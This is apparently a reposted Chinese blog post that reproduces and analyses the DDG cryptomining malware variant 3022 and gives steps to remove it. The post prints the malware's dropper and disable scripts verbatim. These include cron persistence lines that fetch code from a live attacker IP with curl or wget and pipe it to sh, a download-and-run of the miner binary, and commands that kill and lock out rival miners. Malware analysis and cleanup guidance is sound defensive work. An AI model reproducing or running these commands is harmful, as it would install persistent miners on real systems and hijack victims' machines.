本篇文章主要根据360Netlab新出的DDG分析文档来复现新变种3022，会涉及部分分析和清除的方法，
本篇文章只用于学习交流，为广大受害者提供清除思路，请勿用于非法用途，产生一切后果与作者无关
详情请参考文档：https://blog.netlab.360.com/fast-analyze-ddg-v3021-and-v3022/

一、下载

下载脚本：http://119.9.106.27:8000/i.sh（i.sh名称位ddgs一贯的作风）

样本地址：119.9.106.27:8000/static/3022/

首先下载i.sh脚本分析下里边的内容

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbinecho "*/15 * * * * (curl -fsSL http://119.9.106.27:8000/i.sh||wget -q -O- http://119.9.106.27:8000/i.sh) | sh" | crontab -echo "" > /var/spool/cron/rootecho "*/15 * * * * wget -q -O- http://119.9.106.27:8000/i.sh | sh" >> /var/spool/cron/rootmkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/rootecho "*/15 * * * * wget -q -O- http://119.9.106.27:8000/i.sh | sh" >> /var/spool/cron/crontabs/rootcd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeableexport PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep lrnbbce || rm -rf lrnbbce
if [ ! -f "lrnbbce" ]; thenwget -q http://119.9.106.27:8000/static/3022/ddgs.$(uname -m) -O lrnbbce

fi
chmod +x lrnbbce
$(pwd)/lrnbbce || /usr/bin/lrnbbce || /usr/libexec/lrnbbce || /usr/local/bin/lrnbbce || lrnbbce || ./lrnbbce || /tmp/lrnbbceps auxf | grep -v grep | grep lrnbbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep lrnbbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep lrnbbcd | awk '{print $2}' | xargs kill -9`

ddg木马的老套路了，写环境变量、添加到定时任务、下载矿机执行、删除禁用其他挖矿木马(挖矿行业竞争很激烈了)
从3014版本开始增加了云端配置下发 disable.sh 来集中干掉竞争对手，
脚本地址：http://119.9.106.27:8000/static/disable.sh，内容如下

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbinmkdir -p /opt/yilu/work/{xig,xige} /usr/bin/bsd-port
touch /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty /usr/bin/bsd-port/.dbus /usr/bin/bsd-port/nmi /tmp/php /tmp/name /tmp/xc.x86_64
chmod -w /opt/yilu/work/xig /opt/yilu/work/xige /usr/bin/bsd-port
chmod -x /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty /usr/bin/bsd-port/.dbus /usr/bin/bsd-port/nmi /tmp/php /tmp/name /tmp/xc.x86_64
chattr +i /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty /usr/bin/bsd-port/.dbus /usr/bin/bsd-port/nmi /tmp/php /tmp/name /tmp/xc.x86_64rm -rf /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinux
touch /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinux
chmod -rw /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinux
chattr +i /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinuxif [ -e "/tmp/gates.lod" ]; thenrm -rf $(readlink /proc/$(cat /tmp/gates.lod)/exe)kill -9 $(cat /tmp/gates.lod)rm -rf $(readlink /proc/$(cat /tmp/moni.lod)/exe)kill -9 $(cat /tmp/moni.lod)rm -rf /tmp/{gates,moni}.lod
fips auxf | grep -v grep | grep /tmp/thisxxs | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /opt/yilu/work/xig/xig | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /opt/yilu/mservice | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /usr/bin/.sshd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /usr/bin/bsd-port | awk '{print $2}' | xargs kill -9

把同类的挖矿进程放到了这个脚本中，来杀掉yilu、以及BillGate家族的gates进程等
不过这都是之前版本的，现在这个更高级了，直接下发二进制程序disable

这个disable的作用可以参考下360的那篇文章：图片来自360netlab博客

目前为了阻止其它挖矿程序ddg3022主要做了以下措施
1.修改Hosts文件，阻止其它挖矿程序的下发

2.杀掉其它挖矿程序
3.使用二进制文件disable

二、运行复现

接下来执行脚本开始我们的复现过程，crontab已经写入

CPU已经满载，挖矿程序已经在运行

看下/tmp目录下的样本文件

三、清除

老套路，挖矿木马干什么咱们反着来就是了

删除/var/spool/cron/crontab/root，/var/spool/cron/root文件中 echo "*/15 * * * * curl -fsSL http://119.9.106.27:8000/i.sh | sh" >> /var/spool/cron/root

删除/tmp/6Tx3Wq,/tmp/disable,/usr/bin/lrnbbce

kill掉进程：6Tx3Wq，lrnbbce

此时挖矿程序已经清理，后续可以删除被增加的hosts等文件

参考文章：

https://blog.netlab.360.com/https-blog-netlab-360-com-a-fast-ddg-3014-analyze/
https://blog.netlab.360.com/fast-analyze-ddg-v3021-and-v3022/

转载于:https://www.cnblogs.com/Id3al/p/10706324.html

DDG全家桶之3022相关推荐

阿里技术文档：Redis+Spring全家桶+Dubbo精选+高性能+高并发
最近花了很长的时间去搜罗整理Java核心技术好文,我把每个Java核心技术的优选文章都整理成了一个又一个的文档.今天就把这些东西分享给老铁们,也能为老铁们省去不少麻烦,想学什么技能了,遇到哪方面的问题 ...
Java全能手册火了!Redis/Nginx/Dubbo/Spring全家桶/啥都有
前言本文是为了帮大家快速回顾了Java中知识点,这套面试手册涵盖了诸多Java技术栈的面试题和答案,相信可以帮助大家在最短的时间内用作面试复习,能达到事半功倍效果. 本来想将文件上传到github上 ...
阿里技术文档：Redis+Nginx+Spring全家桶+Dubbo精选
最近花了很长的时间去搜罗整理Java核心技术好文,我把每个Java核心技术的优选文章都整理成了一个又一个的文档.今天就把这些东西分享给老铁们,也能为老铁们省去不少麻烦,想学什么技能了,遇到哪方面的问题 ...
TensorFlow全家桶的落地开花 | 2019 Google开发者日
作者 | 唐小引写于上海世博中心出品 | GDD 合作伙伴 CSDN(ID:CSDNnews) Android 10 原生支持 5G,Flutter 1.9.Dart 2.5 正式发布这是 Goo ...
繁凡的ACM算法全家桶（全新的模板整合计划）
整理的算法模板合集: ACM模板点我看算法全家桶系列!!! 实际上是一个全新的模板整合计划 ACM算法全家桶的所有内容的 Portable Document Format 版本全部开源啦 !可 ...
牛客挑战赛36 D. 排名估算（ “概率论全家桶”，好题，拉格朗日插值求自然数 k 次幂之和）
整理的算法模板合集: ACM模板点我看算法全家桶系列!!! 实际上是一个全新的精炼模板整合计划 Weblink https://ac.nowcoder.com/acm/contest/3782/D ...
【学习笔记】《概率与期望全家桶》（ACM / OI）概率与期望 / 概率论知识小结
整理的算法模板合集: ACM模板点我看算法全家桶系列!!! 实际上是一个全新的精炼模板整合计划这块知识很少,但是题很难- 目录 0x00 概率 0x01 基本概念 0x02 古典概率 0x03 条 ...
【学习笔记】线性代数全家桶（在编程竞赛中的应用）
整理的算法模板合集: ACM模板点我看算法全家桶系列!!! 实际上是一个全新的精炼模板整合计划目录 0x00. 矩阵 0x01. 矩阵 0x02. 矩阵的加法与数量乘法 0x03. 矩阵乘法 0x ...
二维几何基础大合集！《计算几何全家桶（一）》（基础运算、点、线、多边形、圆、网格）
整理的算法模板合集: ACM模板点我看算法全家桶系列!!! 实际上是一个全新的模板整合计划目录 1.基本运算 1.1 判断正负函数(sgn) 1.2 点积(数量积.内积)(Dot) 1.3 向量积 ...

DDG全家桶之3022

一、下载

二、运行复现

三、清除

参考文章：

DDG全家桶之3022相关推荐

最新文章

热门文章